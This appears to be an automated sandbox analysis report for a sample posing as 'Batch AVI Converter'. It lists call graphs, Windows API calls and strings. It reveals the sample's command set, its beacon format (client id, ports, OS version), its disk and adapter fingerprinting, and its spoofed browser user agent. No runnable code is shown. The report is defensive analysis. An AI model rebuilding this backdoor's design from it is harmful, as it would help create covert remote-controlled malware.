20807 2d8cb8f 20813 2d8b160 20810->20813 20814 2d8b16a __EH_prolog 20813->20814 20815 2d92443 std::exception::exception 59 API calls 20814->20815 20816 2d8b17b 20815->20816 20819 2d87c30 20816->20819 20822 2d8882a 20819->20822 20821 2d87c4f 20821->20807 20823 2d8883f 20822->20823 20824 2d888b3 20822->20824 20826 2d8884c 20823->20826 20827 2d88863 20823->20827 20851 2d8fa92 20824->20851 20834 2d8905d 20826->20834 20844 2d89150 20827->20844 20833 2d88861 _memmove 20833->20821 20835 2d88854 20834->20835 20836 2d89081 20834->20836 20839 2d8908c 20835->20839 20837 2d8fa92 std::bad_exception::bad_exception 60 API calls 20836->20837 20838 2d8908b 20837->20838 20840 2d89103 20839->20840 20843 2d8909d _memmove 20839->20843 20841 2d8fa92 std::bad_exception::bad_exception 60 API calls 20840->20841 20842 2d8910d 20841->20842 20843->20833 20845 2d891a8 20844->20845 20846 2d8915c 20844->20846 20860 2d8fa64 20845->20860 20850 2d8916a std::bad_exception::bad_exception 20846->20850 20856 2d89a0b 20846->20856 20850->20833 20852 2d92403 std::exception::exception 59 API calls 20851->20852 20853 2d8faaa 20852->20853 20854 2d9448a __CxxThrowException@8 RaiseException 20853->20854 20855 2d8fabf 20854->20855 20857 2d89a15 __EH_prolog 20856->20857 20865 2d8abac 20857->20865 20859 2d89a6c _memmove std::bad_exception::bad_exception 20859->20850 20861 2d92403 std::exception::exception 59 API calls 20860->20861 20862 2d8fa7c 20861->20862 20863 2d9448a __CxxThrowException@8 RaiseException 20862->20863 20866 2d8abb8 20865->20866 20867 2d8abcf 20865->20867 20868 2d93a7c _Allocate 60 API calls 20866->20868 20869 2d8abc3 std::exception::exception 20866->20869 20867->20859 20868->20869 20869->20867 20881 2d8a644 GetProcessHeap HeapFree 20880->20881 20881->19999 20883 2d921ab _LocaleUpdate::_LocaleUpdate 59 API calls 20882->20883 20884 2d95ff5 20883->20884 20885 2d95d8b __mbsnbcmp_l 59 API calls 20884->20885 20886 2d95ffa 20885->20886 20887 2d96acb 20886->20887 20890 2d99d61 __fflush_nolock 59 API 
calls 20886->20890 20905 2d9601a __output_l __aulldvrm _strlen 20886->20905 20888 2d95d8b __mbsnbcmp_l 59 API calls 20887->20888 20889 2d96ad0 20888->20889 20891 2d94e25 __mbsnbcmp_l 9 API calls 20889->20891 20890->20905 20892 2d96aa5 20891->20892 20893 2d9447b __write_nolock 6 API calls 20892->20893 20894 2d923a6 20893->20894 20894->20011 20894->20012 20895 2d9dc3e __isleadbyte_l 59 API calls 20895->20905 20896 2d96b00 79 API calls __output_l 20896->20905 20897 2d96683 RtlDecodePointer 20897->20905 20898 2d96b48 79 API calls _write_multi_char 20898->20905 20899 2d92ea4 _free 59 API calls 20899->20905 20900 2d9fa14 61 API calls __cftof 20900->20905 20901 2d989e4 __malloc_crt 59 API calls 20901->20905 20902 2d966e6 RtlDecodePointer 20902->20905 20903 2d96b74 79 API calls _write_string 20903->20905 20904 2d9670b RtlDecodePointer 20904->20905 20905->20887 20905->20892 20905->20895 20905->20896 20905->20897 20905->20898 20905->20899 20905->20900 20905->20901 20905->20902 20905->20903 20905->20904 20906->20015 20918 2d830ae WSASetLastError 20907->20918 20910 2d830ae 71 API calls 20911 2d83c90 20910->20911 20912 2d816ae 20911->20912 20913 2d816b8 __EH_prolog 20912->20913 20914 2d81701 20913->20914 20915 2d92403 std::exception::exception 59 API calls 20913->20915 20914->19907 20916 2d816dc 20915->20916 20934 2d8a3d4 20916->20934 20919 2d830ec WSAStringToAddressA 20918->20919 20920 2d830ce 20918->20920 20921 2d8a43b 69 API calls 20919->20921 20920->20919 20922 2d830d3 20920->20922 20924 2d83114 20921->20924 20923 2d90a40 Mailbox 68 API calls 20922->20923 20933 2d830d8 20923->20933 20925 2d83154 20924->20925 20931 2d8311e _memcmp 20924->20931 20926 2d83135 20925->20926 20928 2d90a40 Mailbox 68 API calls 20925->20928 20927 2d83193 20926->20927 20929 2d90a40 Mailbox 68 API calls 20926->20929 20932 2d90a40 Mailbox 68 API calls 20927->20932 20927->20933 20928->20926 20929->20927 20930 2d90a40 Mailbox 68 API calls 20930->20926 20931->20926 20931->20930 20932->20933 20933->20910 
20933->20911 20935 2d8a3de __EH_prolog 20934->20935 20942 2d8c939 20935->20942 20939 2d8a3ff 20940 2d9448a __CxxThrowException@8 RaiseException 20939->20940 20941 2d8a40d 20940->20941 20943 2d8b160 std::bad_exception::bad_exception 60 API calls 20942->20943 20944 2d8a3f1 20943->20944 20945 2d8c975 20944->20945 20946 2d8c97f __EH_prolog 20945->20946 20949 2d8b10f 20946->20949 20948 2d8c9ae Mailbox 20948->20939 20950 2d8b119 __EH_prolog 20949->20950 20951 2d8b160 std::bad_exception::bad_exception 60 API calls 20950->20951 20952 2d8b12a Mailbox 20951->20952 20952->20948 20954 2d83bdd __EH_prolog 20953->20954 20955 2d83bfe htonl htonl 20954->20955 20965 2d923e7 20954->20965 20955->20034 20960 2d83c20 __EH_prolog 20959->20960 20961 2d83c41 20960->20961 20962 2d923e7 std::bad_exception::bad_exception 59 API calls 20960->20962 20961->20034 20963 2d83c35 20962->20963 20964 2d8a589 60 API calls 20963->20964 20964->20961 20966 2d92403 std::exception::exception 59 API calls 20965->20966 20967 2d83bf2 20966->20967 20968 2d8a589 20967->20968 20969 2d8a593 __EH_prolog 20968->20969 20976 2d8caac 20969->20976 20973 2d8a5ae 20974 2d9448a __CxxThrowException@8 RaiseException 20973->20974 20975 2d8a5bc 20974->20975 20983 2d923cc 20976->20983 20979 2d8cae8 20980 2d8caf2 __EH_prolog 20979->20980 20986 2d8b47e 20980->20986 20982 2d8cb21 Mailbox 20982->20973 20984 2d92443 std::exception::exception 59 API calls 20983->20984 20985 2d8a5a0 20984->20985 20985->20979 20987 2d8b488 __EH_prolog 20986->20987 20988 2d923cc std::bad_exception::bad_exception 59 API calls 20987->20988 20989 2d8b499 Mailbox 20988->20989 20989->20982 21011 2d8353e 20990->21011 20994 2d82ae8 WSASetLastError connect 20993->20994 20995 2d82ad8 20993->20995 20997 2d8a43b 69 API calls 20994->20997 20996 2d90a40 Mailbox 68 API calls 20995->20996 20998 2d82add 20996->20998 20999 2d82b07 20997->20999 21000 2d90a40 Mailbox 68 API calls 20998->21000 20999->20998 21001 2d90a40 Mailbox 68 API calls 20999->21001 21002 2d82b1b 
21000->21002 21001->20998 21003 2d90a40 Mailbox 68 API calls 21002->21003 21005 2d82b38 21002->21005 21003->21005 21007 2d82b87 21005->21007 21071 2d83027 21005->21071 21007->20040 21010 2d90a40 Mailbox 68 API calls 21010->21007 21012 2d83548 __EH_prolog 21011->21012 21013 2d83576 21012->21013 21014 2d83557 21012->21014 21033 2d82edd WSASetLastError WSASocketA 21013->21033 21015 2d81996 68 API calls 21014->21015 21031 2d8355f 21015->21031 21018 2d835ad CreateIoCompletionPort 21019 2d835db 21018->21019 21020 2d835c5 GetLastError 21018->21020 21022 2d90a40 Mailbox 68 API calls 21019->21022 21021 2d90a40 Mailbox 68 API calls 21020->21021 21023 2d835d2 21021->21023 21022->21023 21024 2d835ef 21023->21024 21025 2d83626 21023->21025 21026 2d90a40 Mailbox 68 API calls 21024->21026 21059 2d8de25 21025->21059 21027 2d83608 21026->21027 21041 2d829ee 21027->21041 21030 2d83659 21032 2d90a40 Mailbox 68 API calls 21030->21032 21031->20036 21032->21031 21034 2d90a40 Mailbox 68 API calls 21033->21034 21035 2d82f0a WSAGetLastError 21034->21035 21036 2d82f21 21035->21036 21040 2d82f41 21035->21040 21037 2d82f3c 21036->21037 21038 2d82f27 setsockopt 21036->21038 21039 2d90a40 Mailbox 68 API calls 21037->21039 21038->21037 21039->21040 21040->21018 21040->21031 21042 2d82a0c 21041->21042 21043 2d82aad 21041->21043 21044 2d82a39 WSASetLastError closesocket 21042->21044 21048 2d90a40 Mailbox 68 API calls 21042->21048 21045 2d90a40 Mailbox 68 API calls 21043->21045 21047 2d82ab8 21043->21047 21046 2d8a43b 69 API calls 21044->21046 21045->21047 21049 2d82a51 21046->21049 21047->21031 21050 2d82a21 21048->21050 21049->21043 21051 2d90a40 Mailbox 68 API calls 21049->21051 21063 2d82f50 21050->21063 21053 2d82a5c 21051->21053 21055 2d82a7b ioctlsocket WSASetLastError closesocket 21053->21055 21056 2d90a40 Mailbox 68 API calls 21053->21056 21058 2d8a43b 69 API calls 21055->21058 21057 2d82a6e 21056->21057 21057->21043 21057->21055 21058->21043 21060 2d8de2f __EH_prolog 21059->21060 21061 
2d93a7c _Allocate 60 API calls 21060->21061 21062 2d8de43 21061->21062 21062->21030 21064 2d82f5b 21063->21064 21065 2d82f70 WSASetLastError setsockopt 21063->21065 21066 2d90a40 Mailbox 68 API calls 21064->21066 21067 2d8a43b 69 API calls 21065->21067 21068 2d82a36 21066->21068 21069 2d82f9e 21067->21069 21068->21044 21069->21068 21070 2d90a40 Mailbox 68 API calls 21069->21070 21070->21068 21072 2d8303b 21071->21072 21073 2d8304d WSASetLastError select 21071->21073 21074 2d90a40 Mailbox 68 API calls 21072->21074 21075 2d8a43b 69 API calls 21073->21075 21078 2d82b59 21074->21078 21076 2d83095 21075->21076 21077 2d90a40 Mailbox 68 API calls 21076->21077 21076->21078 21077->21078 21078->21007 21079 2d82fb4 21078->21079 21080 2d82fc0 21079->21080 21081 2d82fd5 WSASetLastError getsockopt 21079->21081 21083 2d90a40 Mailbox 68 API calls 21080->21083 21082 2d8a43b 69 API calls 21081->21082 21084 2d8300f 21082->21084 21086 2d82b7a 21083->21086 21085 2d90a40 Mailbox 68 API calls 21084->21085 21084->21086 21085->21086 21086->21007 21086->21010 21094 2da5330 21087->21094 21089 2d832b5 RtlEnterCriticalSection 21090 2d90a40 Mailbox 68 API calls 21089->21090 21091 2d832d6 21090->21091 21095 2d83307 21091->21095 21094->21089 21096 2d83311 __EH_prolog 21095->21096 21098 2d83350 21096->21098 21107 2d87db4 21096->21107 21111 2d8239d 21098->21111 21101 2d83390 21117 2d87d5d 21101->21117 21103 2d90a40 Mailbox 68 API calls 21104 2d8337c 21103->21104 21106 2d82d39 71 API calls 21104->21106 21106->21101 21109 2d87dc2 21107->21109 21108 2d87e38 21108->21096 21109->21108 21121 2d88919 21109->21121 21114 2d823ab 21111->21114 21112 2d82417 21112->21101 21112->21103 21113 2d823c1 PostQueuedCompletionStatus 21113->21114 21115 2d823da RtlEnterCriticalSection 21113->21115 21114->21112 21114->21113 21116 2d823f8 InterlockedExchange RtlLeaveCriticalSection 21114->21116 21115->21114 21116->21114 21119 2d87d62 21117->21119 21118 2d832ee RtlLeaveCriticalSection 21118->20055 21119->21118 21132 2d81e7f 
21119->21132 21122 2d88943 21121->21122 21123 2d87d5d 68 API calls 21122->21123 21124 2d88989 21123->21124 21125 2d889b0 21124->21125 21127 2d8a1a6 21124->21127 21125->21108 21128 2d8a1c0 21127->21128 21129 2d8a1b0 21127->21129 21128->21125 21129->21128 21130 2d8fa64 std::bad_exception::bad_exception 60 API calls 21129->21130 21131 2d8a21a 21130->21131 21133 2d90a40 Mailbox 68 API calls 21132->21133 21134 2d81e90 21133->21134 21134->21119 21136 2d83770 21135->21136 21137 2d83755 InterlockedCompareExchange 21135->21137 21139 2d90a40 Mailbox 68 API calls 21136->21139 21137->21136 21138 2d83765 21137->21138 21140 2d832ab 78 API calls 21138->21140 21141 2d83779 21139->21141 21140->21136 21142 2d829ee 76 API calls 21141->21142 21143 2d8378e 21142->21143 21143->20064 21144 40223d 21145 40225a 21144->21145 21154 4021de 21144->21154 21146 402261 21145->21146 21147 4022bd 21145->21147 21148 40b176 21146->21148 21149 402277 lstrcmpiW 21146->21149 21150 4022c7 21147->21150 21153 402286 LoadLibraryExA 21147->21153 21151 40b1e6 StartServiceCtrlDispatcherA 21148->21151 21149->21154 21151->21154 21155 40259e 21153->21155 21155->21148 21155->21154 21156 40b1cb GetProcAddress 21155->21156 21156->21151 21156->21155

                                                              Control-flow Graph
                                                              [Graph edge list not reproduced. Function 2d872a7: InternetOpenA; on success InternetSetOptionA x3 and InternetOpenUrlA, an InternetReadFile loop, then InternetCloseHandle x2. The response is processed under critical section 02DB71B8 through a chain of calls to 2d9226c, with buffers from 2d92edc (_malloc), tokenising via 2d93516 (_strtok) and 2d92780 (_swscanf), release via 2d92ea4 (_free), and Sleep at 2d86704 and 2d876ed before control returns to the loop head at 2d866f0.]
                                                              APIs
                                                              • Sleep.KERNEL32(0000EA60), ref: 02D86704
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D8670F
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D86720
                                                              • _memset.LIBCMT ref: 02D86775
                                                              • _memset.LIBCMT ref: 02D86784
                                                              • InternetOpenA.WININET(?), ref: 02D872B1
                                                              • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D872D9
                                                              • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D872F1
                                                              • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D87309
                                                              • _memset.LIBCMT ref: 02D87319
                                                              • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D87332
                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D87354
                                                              • InternetCloseHandle.WININET(00000000), ref: 02D87374
                                                              • InternetCloseHandle.WININET(00000000), ref: 02D8737F
                                                              • _memset.LIBCMT ref: 02D873C7
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D873EA
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D873FB
                                                              • _malloc.LIBCMT ref: 02D87494
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D874A6
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D874B2
                                                              • _memset.LIBCMT ref: 02D874CC
                                                              • _memset.LIBCMT ref: 02D874DB
                                                              • _memset.LIBCMT ref: 02D874EB
                                                              • _memset.LIBCMT ref: 02D874FE
                                                              • _memset.LIBCMT ref: 02D87514
                                                              • _malloc.LIBCMT ref: 02D8758A
                                                              • _memset.LIBCMT ref: 02D8759B
                                                              • _strtok.LIBCMT ref: 02D875BB
                                                              • _swscanf.LIBCMT ref: 02D875D2
                                                              • _strtok.LIBCMT ref: 02D875E9
                                                              • _free.LIBCMT ref: 02D875F5
                                                              • Sleep.KERNEL32(000007D0), ref: 02D876ED
                                                              • _memset.LIBCMT ref: 02D87761
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D8776E
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D87780
                                                              • _sprintf.LIBCMT ref: 02D8781E
                                                              • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D878E2
                                                              • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D87916
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                              • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                              • API String ID: 696907137-1839899575
                                                              • Opcode ID: 65bd05677515805f772be527574944a30ffab501461eabc8fbd971d4768a69b6
                                                              • Instruction ID: e72acf4f06556ed4c79325a8b87c6856e2e1504b7763b0fd91a5f273a38d103e
                                                              • Opcode Fuzzy Hash: 65bd05677515805f772be527574944a30ffab501461eabc8fbd971d4768a69b6
                                                              • Instruction Fuzzy Hash: 5432FE32548381AFE724AB24D855FAFBBE6EF85714F10081DF58A97390DB719C04CBA6

                                                              Control-flow Graph

                                                              APIs
                                                              • RtlInitializeCriticalSection.NTDLL(02DB71B8), ref: 02D864B6
                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D864CD
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D864D6
                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D864E5
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D864E8
                                                              • GetTickCount.KERNEL32 ref: 02D864F4
                                                                • Part of subcall function 02D8605A: _malloc.LIBCMT ref: 02D86068
                                                              • GetVersionExA.KERNEL32(02DB7010), ref: 02D86521
                                                              • _memset.LIBCMT ref: 02D86540
                                                              • _malloc.LIBCMT ref: 02D8654D
                                                                • Part of subcall function 02D92EDC: __FF_MSGBANNER.LIBCMT ref: 02D92EF3
                                                                • Part of subcall function 02D92EDC: __NMSG_WRITE.LIBCMT ref: 02D92EFA
                                                                • Part of subcall function 02D92EDC: RtlAllocateHeap.NTDLL(00730000,00000000,00000001), ref: 02D92F1F
                                                              • _malloc.LIBCMT ref: 02D8655D
                                                              • _malloc.LIBCMT ref: 02D86568
                                                              • _malloc.LIBCMT ref: 02D86573
                                                              • _malloc.LIBCMT ref: 02D8657E
                                                              • _malloc.LIBCMT ref: 02D86589
                                                              • _malloc.LIBCMT ref: 02D86594
                                                              • _malloc.LIBCMT ref: 02D865A3
                                                              • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D865BA
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D865C3
                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865D2
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D865D5
                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865E0
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D865E3
                                                              • _memset.LIBCMT ref: 02D865F6
                                                              • _memset.LIBCMT ref: 02D86602
                                                              • _memset.LIBCMT ref: 02D8660F
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D8661D
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D8662A
                                                              • _malloc.LIBCMT ref: 02D8664E
                                                              • _malloc.LIBCMT ref: 02D8665C
                                                              • _malloc.LIBCMT ref: 02D86663
                                                              • _malloc.LIBCMT ref: 02D86689
                                                              • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D8669C
                                                              • Sleep.KERNEL32 ref: 02D866AA
                                                              • _malloc.LIBCMT ref: 02D866B6
                                                              • _malloc.LIBCMT ref: 02D866C3
                                                              • _memset.LIBCMT ref: 02D866D8
                                                              • _memset.LIBCMT ref: 02D866E8
                                                              • Sleep.KERNEL32(0000EA60), ref: 02D86704
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D8670F
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D86720
                                                              • _memset.LIBCMT ref: 02D86775
                                                              • _memset.LIBCMT ref: 02D86784
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                              • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                              • API String ID: 2251652938-2678694477
                                                              • Opcode ID: eb357410cbc05182669a9a3160f303a1c393ed0f626fe854e3b4919b2a7cfad5
                                                              • Instruction ID: 47945c44aead18ae0cdf70b63b1e2177777b0cf653a001184a518ba7c2f0695f
                                                              • Opcode Fuzzy Hash: eb357410cbc05182669a9a3160f303a1c393ed0f626fe854e3b4919b2a7cfad5
                                                              • Instruction Fuzzy Hash: 4A719172D48340AFE710AF30AC49B5FBBE9EF85754F100819F98597781DAB49C41CBAA

                                                              Control-flow Graph

                                                              APIs
                                                              • LoadLibraryExA.KERNEL32(?), ref: 00402286
                                                              • lstrcmpiW.KERNEL32(?,/chk), ref: 0040263F
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B1E7
                                                              Strings
                                                              • /chk, xrefs: 00402277
                                                              • XiM#, xrefs: 0040226C
                                                              • C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe, xrefs: 0040B9FD
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherLibraryLoadServiceStartlstrcmpi
                                                              • String ID: /chk$C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe$XiM#
                                                              • API String ID: 2103646607-4002683248
                                                              • Opcode ID: c5a8441475130b9a7a8130812834b89ae97cd73147b0c6c9a1a4b3381dc2569d
                                                              • Instruction ID: 8bf7aede9d04df03068851b22dc39cddd4f593d1d8b98ea544a71e6f5e574920
                                                              • Opcode Fuzzy Hash: c5a8441475130b9a7a8130812834b89ae97cd73147b0c6c9a1a4b3381dc2569d
                                                              • Instruction Fuzzy Hash: 7D31E074908212DFCB118F60CA986A637A4FF05350F2045BBE912BB2C1D7BDD9169B9E

                                                              Control-flow Graph

                                                              APIs
                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                              • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                              • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                              • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                              • API String ID: 514930453-3667123677
                                                              • Opcode ID: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                              • Instruction ID: 9300e3b8f0653b0f10764aaa79a1f2494f67c894d04353eb45b18fdb2f867aae
                                                              • Opcode Fuzzy Hash: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                              • Instruction Fuzzy Hash: 9621B870944109AFEF11DF65C944BEF7BB8EF41344F1440BAE504B22E1E778A985CB69

                                                              Control-flow Graph

                                                              APIs
                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D8F8EF
                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D8F908
                                                              • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D8F92D
                                                              • FreeLibrary.KERNEL32(00000000), ref: 02D8F9B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                              • String ID: GetAdaptersInfo$iphlpapi.dll
                                                              • API String ID: 514930453-3114217049
                                                              • Opcode ID: 62fad148241a5eb0597d608fcd14fcc773a49a4c4018dfb838e4550dfcfd76f6
                                                              • Instruction ID: 28c1898e6df3084b43820342bb2d8679745a56775217f45e493826d20d7dcb81
                                                              • Opcode Fuzzy Hash: 62fad148241a5eb0597d608fcd14fcc773a49a4c4018dfb838e4550dfcfd76f6
                                                              • Instruction Fuzzy Hash: FF21A271A04219AFDB10FBA8D884AEEBBB8EF05310F5540AAE545E7700DB348D45CBA4

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D8F7F4
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D8F832
                                                              • GetLastError.KERNEL32 ref: 02D8F893
                                                              • CloseHandle.KERNEL32(?), ref: 02D8F8CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                              • String ID: \\.\PhysicalDrive0
                                                              • API String ID: 4026078076-1180397377
                                                              • Opcode ID: a67ddbdf22d80fbf8241824f980d04bc5dc4162f762d52a03dccccfb53466e3b
                                                              • Instruction ID: 498aa458b4a1ceae14dd21f7c2a57c9ec2e977264ce748c8c819ae9b206a0475
                                                              • Opcode Fuzzy Hash: a67ddbdf22d80fbf8241824f980d04bc5dc4162f762d52a03dccccfb53466e3b
                                                              • Instruction Fuzzy Hash: AA31A1B1E00219AFDB14EFA5D884BAEBBB9FF04754F70416AE505A3780D7709E04CB94

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                              • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                              • GetLastError.KERNEL32 ref: 00401B0E
                                                              • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                              • String ID: \\.\PhysicalDrive0
                                                              • API String ID: 4026078076-1180397377
                                                              • Opcode ID: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                              • Instruction ID: c07866d4b4e887281577b2397114bebd63d98cfae9bba907e2345ee80fd6f57b
                                                              • Opcode Fuzzy Hash: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                              • Instruction Fuzzy Hash: 00316D71D01118EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3786E45CB98

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 3u-
                                                              • API String ID: 2738559852-451251065
                                                              • Opcode ID: 16116e5f9fe11f445e76e94f4ce39d25582c78189aade2958a6ffed0702cca10
                                                              • Instruction ID: 9c7a7a431b4c20768474a20ee3d65a76fb46c157fa72fadc5b3fccb933d3b21b
                                                              • Opcode Fuzzy Hash: 16116e5f9fe11f445e76e94f4ce39d25582c78189aade2958a6ffed0702cca10
                                                              • Instruction Fuzzy Hash: 3B3184F351C210EBD3086E69EC95ABFFBE8EB58220F16092DD6C6D3750D6755800CA96
                                                              APIs
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B1E7
                                                              • lstrcmpiW.KERNEL32 ref: 0040B846
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherServiceStartlstrcmpi
                                                              • String ID:
                                                              • API String ID: 369133424-0
                                                              • Opcode ID: 3ac7439ccd3d2d2a552c611123ee1ca9a0c00ba3a9cf8fa8e8ea2ccdf319ad21
                                                              • Instruction ID: 425363ba50cf9f58d8ddcc0d8d41c788735a15cde9808f692751c9cb04a70fb9
                                                              • Opcode Fuzzy Hash: 3ac7439ccd3d2d2a552c611123ee1ca9a0c00ba3a9cf8fa8e8ea2ccdf319ad21
                                                              • Instruction Fuzzy Hash: 51D05E30948105DBDB109FA1CA4C96A367CEA053447204073E80AF11D2E77CDA12EA5F

                                                              Strings
                                                              • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D86735
